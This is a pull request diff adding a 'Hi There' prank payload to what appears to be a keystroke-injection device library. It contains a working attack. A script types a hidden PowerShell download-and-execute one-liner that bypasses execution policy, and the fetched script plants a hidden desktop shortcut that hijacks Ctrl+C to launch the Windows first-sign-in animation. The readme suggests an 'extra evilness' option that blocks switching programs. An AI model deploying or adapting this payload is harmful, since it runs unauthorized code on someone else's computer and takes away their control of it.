New Payload - Hi There (#496)

payloads/library/prank/Win_PoSh_HiThere/payload.txt

@@ -0,0 +1,37 @@
+#!/bin/bash
+# Title:          Hi There
+# Description:    Creates a hidden link file that override the ctrl+c functionality.
+#                 So, where the use press ctrl+c it lunches the first sign-in animation.
+# Author:         Cribbit
+# Version:        1.0
+# Category:       Pranks
+# Target:         Windows (Powershell 5.1+)
+# Attackmodes:    RNDIS_ETHERNET HID
+# Props:          v3ded, Hexacorn and Audibleblink (Python Server)
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 200
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+QUACK DELAY 500
+QUACK CTRL c
+LED FINISH

payloads/library/prank/Win_PoSh_HiThere/readme.md

@@ -0,0 +1,33 @@
+# Hi There
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: Pranks
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+- Props: v3ded, Hexacorn and Audibleblink (Python Server)
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Description
+Creates a hidden link file that override the ctrl+c functionality.
+So, where the use press ctrl+c it lunches the first sign-in animation.
+
+## Notes
+to kill the animation, you need to open task manger and look for "First Sign-in Animation".
+For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it.
+
+## More information
+<https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence>
+
+<https://www.hexacorn.com/blog/2022/01/16/windows-installation-animation/>
+
+## Colours
+| Status   | Colour                        | Description                 |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP    | Magenta solid                 | Setting attack mode         |
+| ATTACK   | Yellow single blink           | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished          |

payloads/library/prank/Win_PoSh_HiThere/s

@@ -0,0 +1,19 @@
+$path                      = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk"
+$wshell                    = New-Object -ComObject Wscript.Shell
+$shortcut                  = $wshell.CreateShortcut($path)
+
+$shortcut.IconLocation     = "C:\Windows\System32\shell32.dll,70"
+
+$shortcut.TargetPath       = "C:\Windows\System32\oobe\FirstLogonAnim.exe"
+$shortcut.Arguments        = "/RunFirstLogonAnim"
+$shortcut.WorkingDirectory = "C:"
+$shortcut.HotKey           = "CTRL+C"
+$shortcut.Description      = "Contain very important information"
+
+$shortcut.WindowStyle      = 7
+                           # 7 = Minimized window
+                           # 3 = Maximized window
+                           # 1 = Normal    window
+$shortcut.Save()
+
+(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)